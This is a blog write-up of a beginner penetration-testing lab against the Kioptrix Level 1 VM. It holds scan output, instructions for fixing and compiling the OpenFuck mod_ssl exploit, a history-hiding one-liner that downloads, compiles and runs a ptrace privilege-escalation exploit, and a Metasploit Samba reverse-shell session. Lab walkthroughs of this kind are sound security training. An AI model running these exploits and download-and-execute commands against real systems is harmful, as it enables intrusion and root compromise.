Core dump overflow

Core dump in progress...

Pentest lab - Kioptrix Level 1

| Comments

For today’s pentest lab, I will use the Kioptrix Level 1 virtual machine as the target. Kioptrix Level 1 is the first in a series of vulnerable machines for beginner penetration testing practice.

First, to get its IP address, I had to ping sweep the subnet with the following command:

1

nmap -sP 192.168.127.0/24

By correlating the MAC address information from the scan with that from VMware, I now know the IP for the machine is 192.168.127.153.

Now, port scan the target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

root@kali:~# nmap -A -p1-65535 192.168.127.153

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-12 22:56 EEST
Nmap scan report for 192.168.127.153
Host is up (0.00035s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2014-06-12T19:58:14+00:00; +1m51s from local time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
MAC Address: 00:0C:29:1A:EE:9E (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.127.153

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds

Port 22 ssh

According to Nessus, the SSH version is vulnerable to CVE-2002-0083:

Versions prior than 3.1 are vulnerable to an off by one error that allows local users to gain root access, and it may be possible for remote users to similarly compromise the daemon for remote access. In addition, a vulnerable SSH client may be compromised by connecting to a malicious SSH daemon that exploits this vulnerability in the client code, thus compromising the client system.

I searched, but I couldn’t find a suitable exploit for this, so will leave it at this.

Port 80 / 443 apache ssl

Now let’s try that outdated Apache server. Here are the results from a Nikto scan against it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

root@kali:~# nikto -host 192.168.127.153
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.127.153
+ Target Hostname:    192.168.127.153
+ Target Port:        80
+ Start Time:         2014-06-13 00:13:08 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 06:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2014-06-13 00:13:52 (GMT3) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The interesting line that will lead to the exploit is this one:

+ mod_ssl/2.8.4 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.

mod_ssl < 2.8.7 is vulnerable to a remotely exploitable buffer overflow when attempting to cache SSL sessions. This allows for remote code execution, and the modification of any file on the system.

An exploit is available at http://www.exploit-db.com/exploits/764/

Before jumping in, a little modification is necessary because the exploit is old. If we try to compile right away we will get a bunch of errors. So let’s make the changes.

If you don’t already have it, install the libssl-dev library:

1

 apt-get install libssl-dev

Now add the following lines in the C source code:

1
2

#include <openssl/rc4.h>
#include <openssl/md5.h>

Next, search for wget in the source and replace the URL with the newer one:

1

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

In the get_server_hello function, change the declaration

1

unsigned char *p, *end;

to

1

const unsigned char *p, *end;

Now we can compile the exploit:

1

gcc -o openfuck openfuck.c -lcrypto

Now, if you run it, you will see a range of supported offsets. From our previous scan, we know those applicable to our target are the redhat 1.3.20 versions. We can manually search for them in the offsets or run the following:

1

./openfuck | grep -i redhat | grep "1.3.20"

This will give us 2 offsets:

1
2
3

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1

0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

So, let’s try it out:

1
2
3
4
5
6
7
8
9
10
11

./openfuck 0x6a 192.168.127.153 443

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80fe500

Ready to send shellcode

Spawning shell...

Good Bye!

Ok, that one didn’t work. Let’s try the other one:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

./openfuck 0x6b 192.168.127.153 443

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80fc4e8

Ready to send shellcode

Spawning shell...

bash: no job control in this shell

bash-2.05$

bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;

--14:29:59--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

           => `ptrace-kmod.c'

Connecting to dl.packetstormsecurity.net:80... connected!

HTTP request sent, awaiting response... 200 OK

Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

14:30:00 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 1444

[+] Waiting for signal

[+] Signal caught

[+] Shellcode placed at 0x4001189d

[+] Now wait for suid shell...

whoami

root

And we got a shell!

Port 139 samba

The exploit for this is available in Metasploit:

Samba trans2open Overflow (Linux x86)

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce


msf exploit(trans2open) > set RHOST 192.168.127.153
RHOST => 192.168.127.153
msf exploit(trans2open) > set payload linux/x86/shell_reverse_tcp 
payload => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(trans2open) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.153:1047) at 2014-06-13 00:31:15 +0300
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.153:1048) at 2014-06-13 00:31:15 +0300

whoami
root

There is a flag present on this machine, which is located here:

/var/spool/mail/root

If you are reading this, you got root. Congratulations. Level 2 won’t be as easy…

And this was the first level in the Kioptrix series. Here’s a cookie till next time:

You’re a card which will have to be dealt with.

Comments